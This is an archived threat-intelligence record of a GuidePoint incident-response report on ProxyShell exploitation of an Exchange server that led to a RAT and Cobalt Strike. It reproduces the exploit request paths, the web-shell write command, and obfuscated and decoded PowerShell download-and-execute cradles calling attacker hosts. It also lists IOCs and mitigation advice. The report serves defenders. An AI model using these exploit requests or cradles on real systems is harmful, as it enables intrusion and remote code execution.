{
	"id": "4c84cc35-6171-4b23-9f8e-69a0993627cd",
	"created_at": "2026-04-06T00:10:40.347439Z",
	"updated_at": "2026-04-10T13:12:51.61963Z",
	"deleted_at": null,
	"sha1_hash": "9240a1b5e64180f5a6891e5493e8c2047bdde139",
	"title": "A Ransomware Near Miss: ProxyShell, a RAT, and Cobalt Strike",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 344981,
	"plain_text": "A Ransomware Near Miss: ProxyShell, a RAT, and Cobalt Strike\r\nBy GuidePoint Security\r\nPublished: 2021-09-21 · Archived: 2026-04-05 16:18:56 UTC\r\nPublished 9/21/21, 9:00am\r\nIntroduction\r\nIn many instances, threat actors are paying just as much attention to public vulnerability disclosures as the blue\r\nteam. In some cases, they are paying even more attention to them, especially when proof-of-concept code is\r\nreleased for successful exploitation. This often results in fast turnaround of intrusion capabilities that can be\r\nleveraged to obtain access to an unsuspecting network. Such is the case with the Microsoft Exchange ProxyShell\r\nvulnerabilities.\r\nThe GuidePoint DFIR team was engaged to respond to alerts of Cobalt Strike being detected on an on-premises\r\nMicrosoft Exchange server and other Windows servers in an environment. Throughout the course of our\r\ninvestigation, we were able to eradicate all threat actor presence and Cobalt Strike Beacons and confirm that\r\nProxyShell vulnerabilities were used as the initial intrusion vector that resulted in the execution of a remote access\r\ntrojan on the compromised Exchange server. Additionally, we found evidence of tools and tactics being used that\r\nshare a high degree of similarity with the recent Conti affiliate playbooks leak.\r\nExploiting ProxyShell to Execute PowerShell\r\nLate in August, Microsoft announced the existence of CVE-2021-34473, CVE-2021-34523, and CVE-2021-\r\n31207, and with their powers combined, they are ProxyShell. These vulnerabilities, documented very thoroughly\r\nby FireEye, leverage pre-auth path confusion for ACL bypass, elevation of privilege on the Exchange PowerShell\r\nbackend, and post-auth arbitrary file writes to install a web shell onto the compromised system.\r\nIn this incident, we observed the following attack chain that successfully exploited ProxyShell vulnerabilities on\r\nthe compromised Exchange server. 
This exploitation led to a subsequent PowerShell execution that resulted in\r\nfurther malware being executed on the system.\r\nLocated below are the relevant log entries depicting ProxyShell exploitation:\r\nPre-Auth Path Confusion ACL Bypass (CVE-2021-34473)\r\n2021-08-21 06:45:00\r\nPOST /autodiscover/autodiscover.json @evil.corp/mapi/emsmdb?\r\n\u0026Email=autodiscover/autodiscover.json%3F@evil.corp\u0026CorrelationID=\u003cempty\u003e;\u0026cafeReqId=93a8d925-536f-4b92-821b-d8c7a4147022; 443 – 139[.]28[.]235[.]7 python-requests/2.26.0 - 200 0 0 75\r\nhttps://www.guidepointsecurity.com/blog/a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike/\r\nPage 1 of 9\n\nElevation of Privilege using Exchange PowerShell Backend (CVE-2021-34523)\r\n2021-08-21 06:45:01\r\nPOST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=\u003credacted\u003e\u0026Email=autodiscover/autodiscover.json%3F@evil.corp\r\n\u0026CorrelationID=\u003cempty\u003e;\u0026cafeReqId=fddfd6d8-6171-4259-acfa-1bedf67e796c; 443 – 139[.]28[.]235[.]7 python-requests/2.26.0 -\r\n200 0 0 98\r\nRCE via Post-Auth Arbitrary File Write\r\n2021-08-21 06:45:01\r\nNew-MailboxExportRequest -Mailbox \u003credacted\u003e -IncludeFolders \"#Drafts#\" -ContentFilter “Subject -eq\r\n'frhnc'” -ExcludeDumpster True -FilePath \"\\\\127.0.0.1\\c$\\inetpub\\wwwroot\\aspnet_client\\jotzv.aspx”\r\nWeb Shell Invocation\r\n2021-08-21 06:45:01\r\nPOST /aspnet_client/jotzv.aspx - 443 – 139[.]28[.]235[.]7 python-requests/2.26.0 - 200 0 0 691\r\nWeb Shell Command Executed\r\n2021-08-21 06:45:01\r\npowershell -nop -w hidden -ep bypass -enc\r\nSQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGM\r\nAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAG\r\ngAdAB0AHAAOgAvAC8ANAA1AC4AMwAyAC4AMgAyADkALgA2ADYALwByAHUAbgAuA\r\nHQAeAB0ACIAKQA=\r\nDecoded:\r\nIEX (New-Object Net.Webclient).downloadstring(“hxxp://45[.]32[.]229[.]66/run.txt”)\r\nDownload, Download, Download, RAT!\r\nThe PowerShell 
execution mechanism was interesting because it downloaded several payloads from multiple\r\nlocations before achieving its final goal of executing a RAT in memory on the compromised Exchange server.\r\nFigure 1: Download and Execution Mechanism\r\nWhen the initial obfuscated PowerShell command is executed, it first retrieves additional commands from\r\nhxxp://45[.]32[.]229[.]66/run.txt . We retrieved the payload from the command and control server and\r\nobserved the following command contents:\r\n$path = $Env:temp+'\\komar.ps1';\r\n$client = New-Object System.Net.WebClient;\r\n$client.downloadfile('hxxp://45[.]32[.]229[.]66/komar.ps1',$path);\r\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden -executionpolicy bypass\r\n-file $path\r\nBy executing this series of PowerShell commands on the compromised Exchange server, the threat actor\r\ndownloaded another payload from the same command and control server, saved the PowerShell script payload to\r\n$ENV:temp\\komar.ps1 , and then executed the PowerShell script from a newly created 32-bit PowerShell process.\r\nThe contents of komar.ps1 are ultimately responsible for decoding an obfuscated payload, loading it into memory,\r\nand executing it using a newly created thread. 
The obfuscation method, outlined below, is straightforward and\r\nuses a simple, but effective, method that leverages RegEx to read strings backwards and concatenate them\r\ntogether.\r\n$oaMNWBoiPsrJXPvIQjolY = (([regex]::Matches('\u003credacted for brevity\u003e ','.','RightToLeft') | ForEach\r\n{$_.value}) -join '')\r\n$lKasviAMAEPbJhgGKKIld = (([regex]::Matches('\u003credacted for brevity\u003e ','.','RightToLeft') | ForEach\r\n{$_.value}) -join '')\r\n[Byte[]]$JTpvAKubThgBlDnqojikG = [System.Convert]::FromBase64String((-\r\njoin($oaMNWBoiPsrJXPvIQjolY,$lKasviAMAEPbJhgGKKIld)))\r\nThe resultant value of $JTpvAKubThgBlDnqojikG (the final payload) is shellcode that is loaded into memory and\r\nexecuted. Using SpeakEasy, we were able to emulate the shellcode and obtain details on its functionality.\r\n0x1035: 'kernel32.VirtualAlloc(0x0, 0x20000, 0x3000, \"PAGE_EXECUTE_READWRITE\")' -\u003e 0x50000\r\n0x15c1: 'kernel32.LoadLibraryA(\"wininet.dll\")' -\u003e 0x7bc00000\r\n0x1613: 'kernel32.GetProcAddress(0x7bc00000, \"InternetOpenA\")' -\u003e 0xfeee0000\r\n0x1655: 'kernel32.GetProcAddress(0x7bc00000, \"InternetOpenUrlA\")' -\u003e 0xfeee0001\r\n0x1697: 'kernel32.GetProcAddress(0x7bc00000, \"InternetReadFile\")' -\u003e 0xfeee0002\r\n0x16d9: 'kernel32.GetProcAddress(0x7bc00000, \"InternetCloseHandle\")' -\u003e 0xfeee0003\r\n0x16e9: 'wininet.InternetOpenA(0x0, 0x0, 0x0, 0x0, 0x0)' -\u003e 0x20\r\n0x1702: 'wininet.InternetOpenUrlA(0x20, \"hxxp://108[.]62[.]12[.]122/Agent32.bin\", 0x0, 0x0,\r\n\"INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_RELOAD\", 0x0)' -\u003e 0x28\r\n0x1730: 'wininet.InternetReadFile(0x28, 0x50000, 0x20000, 0x1203f84)' -\u003e 0x1\r\n0x1737: 'wininet.InternetCloseHandle(0x28)' -\u003e 0x1\r\n0x173e: 'wininet.InternetCloseHandle(0x20)' -\u003e 0x1\r\nThe emulated shellcode indicates that there is yet another downloaded payload that is 
obtained from a second\r\ncommand and control server. The payload is also loaded into memory and executed on the compromised system.\r\nWe retrieved Agent32.bin from the command and control server and conducted a thorough analysis of its\r\ncapabilities. Initially, an embedded PE is unpacked into memory and execution is transferred to the newly\r\nunpacked executable. The malware then collects the following information from the compromised system and\r\nsends it to the command and control server:\r\nSystem Name\r\nUser (including domain)\r\nVolumes information\r\nProcess ID and name\r\nNetwork interface IP addresses\r\nSystem version information\r\nThe compromised system information is then encrypted and sent to the command and control server via an HTTP\r\nPOST request.\r\nFigure 2: HTTP POST Request to Command and Control\r\nAs we dug deeper into the capabilities of this malware, we determined that its intended purpose was to provide\r\nremote access trojan (RAT) capabilities via commands received from the command and control server.\r\nSpecifically, this RAT has the following capabilities:\r\nProcess injection into cmd.exe or svchost.exe\r\nFile read, write, and delete\r\nNamed pipe reads and writes\r\nScript/Command execution via cmd.exe or PowerShell\r\nCreation of new processes to spawn malware executables\r\nDLL execution via Rundll32\r\nIn this case, this RAT was confirmed as being used to invoke Cobalt Strike on the compromised Exchange server.\r\nBeacons, Beacons Everywhere\r\nWhen Cobalt Strike is discovered in an environment, it is common to obtain different beacon configurations\r\nassociated with different team servers. It is also common to find Cobalt Strike beacons on multiple systems within\r\nthe compromised environment. 
In this incident, we discovered Cobalt Strike beacons on 15 critical infrastructure\r\nservers with four different beacon configurations defining four different team server IP addresses.\r\nThree of the beacons were using no malleable C2 profiles or very commonly observed malleable C2 profiles;\r\nhowever, one beacon was using a malleable C2 profile that is less common and masquerades as being associated\r\nwith Imperva. A snippet from the beacon configuration associated with that malleable C2 profile is located below:\r\nFigure 3: Snippet of Cobalt Strike Beacon\r\nIn early August 2021, a disgruntled Conti affiliate leaked Conti’s playbooks and toolsets on the underground\r\nforum XSS. In addition to Cobalt Strike, which was heavily utilized during this incident and is heavily used by Conti\r\nand other ransomware groups, the following tools were identified within the environment:\r\nTool Name Description\r\nremovesophos.bat Sophos anti-virus removal utility\r\nuninstallSophos.bat Sophos anti-virus removal utility\r\nrclone.exe Data syncing utility commonly used for exfiltration\r\nTable 1: Observed Tools Sharing Similarities with Conti’s Tactics and Toolsets\r\nWe are unable to confirm whether this activity was related to Conti or one of its affiliates without the presence of\r\nencrypted files or ransom notes. That being said, the release of Conti’s playbooks was a double-edged sword. We\r\nreceived key insights into the group’s tactics and toolsets; however, now that those playbooks are public, other\r\nthreat actors are free to use those playbooks for their own benefit.\r\nRecommendations\r\nThis attack originated from the exploitation of ProxyShell, a critical vulnerability in the Microsoft Exchange\r\nplatform, which resulted in the deployment of Cobalt Strike. 
Cobalt Strike continues to be sighted in a high\r\nvolume of incidents and will likely continue to be one of the post-exploitation tools of choice for threat actors due\r\nto its extreme flexibility and effective nature. With that in mind, here are some recommendations for mitigating\r\nthe risk associated with ProxyShell and proactively detecting Cobalt Strike and other threats within your\r\nenvironment:\r\nUpdate your Microsoft Exchange Server to the most recent version to mitigate the effects of CVE-2021-\r\n34473, CVE-2021-34523, and CVE-2021-31207.\r\nGuidance from Microsoft\r\nEnsure that EDR and other behavioral detection mechanisms are enabled and being actively reviewed in\r\nthe environment.\r\nImplement detections for suspicious and malicious behaviors including rundll32, regsvr32, or other\r\nnative Windows processes making connections to external IP addresses.\r\nReview and baseline all PowerShell executions for anomalies.\r\nReview 7045 events for new service creations.\r\nIncrease Windows event logging to ensure that critical events are captured and alerted on if possible.\r\nSysmon is a great choice for this type of logging.\r\nActively perform threat hunting in your environment and incorporate threat intelligence into your hunting\r\nactivities.\r\nConclusion\r\nThis incident started as so many others do, with Cobalt Strike alerts and the discovery of easily exploited\r\nvulnerabilities. 
This scenario demonstrates the importance of vulnerability management and patching, proactive\r\nand layered detection capabilities, and diligent response.\r\nAlthough ProxyShell was successfully exploited and Cobalt Strike was prevalent in the environment, the impacted\r\norganization was able to detect malicious activity early enough to begin incident response, eradicate the threat\r\nactor from their network, and prevent a likely ransomware attack.\r\nIndicators of Compromise (IOCs)\r\nIndicator Type Description\r\nC:\\Windows\\Temp\\n88.dll Filename Cobalt Strike Stager\r\nc:\\windows\\temp\\komar.ps1 Filename\r\nMalicious PowerShell\r\nScript – Downloader for\r\nAgent32.bin\r\nc:\\windows\\temp\\79-220.dll Filename Cobalt Strike Stager\r\nremovesophos.bat Filename\r\nSophos anti-virus\r\nremoval utility\r\nuninstallSophos.bat Filename\r\nSophos anti-virus\r\nremoval utility\r\nrclone.exe Filename\r\nData syncing utility\r\ncommonly used for\r\nexfiltration\r\n37[.]221[.]115[.]68 IPv4 Address Cobalt Strike Team Server\r\n45[.]32[.]229[.]66 IPv4 Address Server Hosting Payloads\r\n216[.]250[.]248[.]88 IPv4 Address Cobalt Strike Team Server\r\n108[.]62[.]12[.]122 IPv4 Address Server Hosting Payloads\r\n185[.]153[.]199[.]164 IPv4 Address Cobalt Strike Team Server\r\n139[.]28[.]235[.]7 IPv4 Address\r\nIP Address Used for Initial\r\nProxyShell Exploitation\r\nf3b30bf4754c255107\r\n2d5e56ec263b80\r\nMD5 Cobalt Strike Stager\r\na9a78153f47ed223aa\r\n7b5ddd7023e005\r\nMD5 Cobalt Strike Stager\r\n4DD315284258A738E7472\r\n50CBA91CB3F\r\nMD5 Agent32.bin\r\n0b175c5c5968abe663436\r\naba278cff02\r\nMD5 Cobalt Strike Stager\r\nC524CA6A8A86C36A34FB4D\r\nC06A4A2696E80A1C07\r\nSHA1 Agent32.bin\r\n6e5388b4a55115d9819795a\r\n2d6571642c36b94cf\r\nSHA1 
Cobalt Strike Stager\r\n6029de4976f7ef65d1975d\r\n802e091a217a49fcfe\r\nSHA1 Cobalt Strike Stager\r\n3ec37e679ebdf3a7122323\r\ndbc767128ed61f20d9\r\nSHA1 Cobalt Strike Stager\r\n196CD59446AD6BD6258EDAF\r\n94D4845E1A73455F87BCAEFF\r\n4241606366B6F7D87\r\nSHA256 Agent32.bin\r\n75b2f84255fed3e5c6dc0f2ea674\r\nc633059797784cdb172d7b3ad6c\r\n7d50b6954\r\nSHA256 Cobalt Strike Stager\r\ne7efa4414fb1904a26900c364f3\r\n49473e15a5f8c427560b73c259\r\n89d2a8efb34\r\nSHA256 Cobalt Strike Stager\r\nhxxp://193.29.104.218/push URL\r\nCobalt Strike Beacon\r\nGET URL\r\nhxxp://193.29.104.218/submit.php URL\r\nCobalt Strike Beacon\r\nPOST URL\r\nhxxp://216.250.248.88/cm URL\r\nCobalt Strike Beacon\r\nGET URL\r\nhxxp://216.250.248.88/j.ad URL\r\nCobalt Strike Beacon\r\nGET URL\r\nhxxp://216.250.248.88/submit.php URL\r\nCobalt Strike Beacon\r\nPOST URL\r\nhxxp://45.32.229.66/komar.ps1 URL\r\nMalicious PowerShell\r\nScript – Downloader for\r\nAgent32.bin\r\nhxxp://79[.]141[.]169[.]220/bSVQ URL\r\nCobalt Strike Stager\r\nTarget (Beacon Download)\r\nhxxp://79[.]141[.]169[.]220/dpixel URL\r\nCobalt Strike Beacon\r\nGET URL\r\nhxxp://79[.]141[.]169[.]220/OKaa URL\r\nCobalt Strike Stager Target\r\n(Beacon Download)\r\nhxxp://79[.]141[.]169[.]220/\r\nsubmit.php\r\nURL\r\nCobalt Strike Beacon\r\nPOST URL\r\nhxxps://37[.]221[.]115[.]68/\r\ncopyright.css\r\nURL\r\nCobalt Strike Beacon\r\nGET URL\r\nhxxps://37[.]221[.]115[.]68/ms URL\r\nCobalt Strike Beacon\r\nPOST URL\r\nMozilla/5.0 (Linux; Android 8.0.0;\r\nSM-G960F Build/R16NW)\r\nAppleWebKit/537.36 (KHTML,\r\nlike Gecko) Chrome/62.0.3202\r\nUser-Agent\r\nCobalt Strike Beacon\r\nUser-Agent\r\nSource: https://www.guidepointsecurity.com/blog/a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.guidepointsecurity.com/blog/a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike/"
	],
	"report_names": [
		"a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "50068c14-343c-4491-b568-df41dd59551c",
			"created_at": "2022-10-25T15:50:23.253218Z",
			"updated_at": "2026-04-10T02:00:05.234464Z",
			"deleted_at": null,
			"main_name": "Indrik Spider",
			"aliases": [
				"Indrik Spider",
				"Evil Corp",
				"Manatee Tempest",
				"DEV-0243",
				"UNC2165"
			],
			"source_name": "MITRE:Indrik Spider",
			"tools": [
				"Mimikatz",
				"PsExec",
				"Dridex",
				"WastedLocker",
				"BitPaymer",
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b296f34c-c424-41da-98bf-90312a5df8ef",
			"created_at": "2024-06-19T02:03:08.027585Z",
			"updated_at": "2026-04-10T02:00:03.621193Z",
			"deleted_at": null,
			"main_name": "GOLD DRAKE",
			"aliases": [
				"Evil Corp",
				"Indrik Spider ",
				"Manatee Tempest "
			],
			"source_name": "Secureworks:GOLD DRAKE",
			"tools": [
				"BitPaymer",
				"Cobalt Strike",
				"Covenant",
				"Donut",
				"Dridex",
				"Hades",
				"Koadic",
				"LockBit",
				"Macaw Locker",
				"Mimikatz",
				"Payload.Bin",
				"Phoenix CryptoLocker",
				"PowerShell Empire",
				"PowerSploit",
				"SocGholish",
				"WastedLocker"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "9806f226-935f-48eb-b138-6616c9bb9d69",
			"created_at": "2022-10-25T16:07:23.73153Z",
			"updated_at": "2026-04-10T02:00:04.729977Z",
			"deleted_at": null,
			"main_name": "Indrik Spider",
			"aliases": [
				"Blue Lelantos",
				"DEV-0243",
				"Evil Corp",
				"G0119",
				"Gold Drake",
				"Gold Winter",
				"Manatee Tempest",
				"Mustard Tempest",
				"UNC2165"
			],
			"source_name": "ETDA:Indrik Spider",
			"tools": [
				"Advanced Port Scanner",
				"Agentemis",
				"Babuk",
				"Babuk Locker",
				"Babyk",
				"BitPaymer",
				"Bugat",
				"Bugat v5",
				"Cobalt Strike",
				"CobaltStrike",
				"Cridex",
				"Dridex",
				"EmPyre",
				"EmpireProject",
				"FAKEUPDATES",
				"FakeUpdate",
				"Feodo",
				"FriedEx",
				"Hades",
				"IEncrypt",
				"LINK_MSIEXEC",
				"MEGAsync",
				"Macaw Locker",
				"Metasploit",
				"Mimikatz",
				"PayloadBIN",
				"Phoenix Locker",
				"PowerShell Empire",
				"PowerSploit",
				"PsExec",
				"QNAP-Worm",
				"Raspberry Robin",
				"RaspberryRobin",
				"SocGholish",
				"Vasa Locker",
				"WastedLoader",
				"WastedLocker",
				"cobeacon",
				"wp_encrypt"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "6c4f98b3-fe14-42d6-beaa-866395455e52",
			"created_at": "2023-01-06T13:46:39.169554Z",
			"updated_at": "2026-04-10T02:00:03.23458Z",
			"deleted_at": null,
			"main_name": "Evil Corp",
			"aliases": [
				"GOLD DRAKE"
			],
			"source_name": "MISPGALAXY:Evil Corp",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434240,
	"ts_updated_at": 1775826771,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9240a1b5e64180f5a6891e5493e8c2047bdde139.pdf",
		"text": "https://archive.orkl.eu/9240a1b5e64180f5a6891e5493e8c2047bdde139.txt",
		"img": "https://archive.orkl.eu/9240a1b5e64180f5a6891e5493e8c2047bdde139.jpg"
	}
}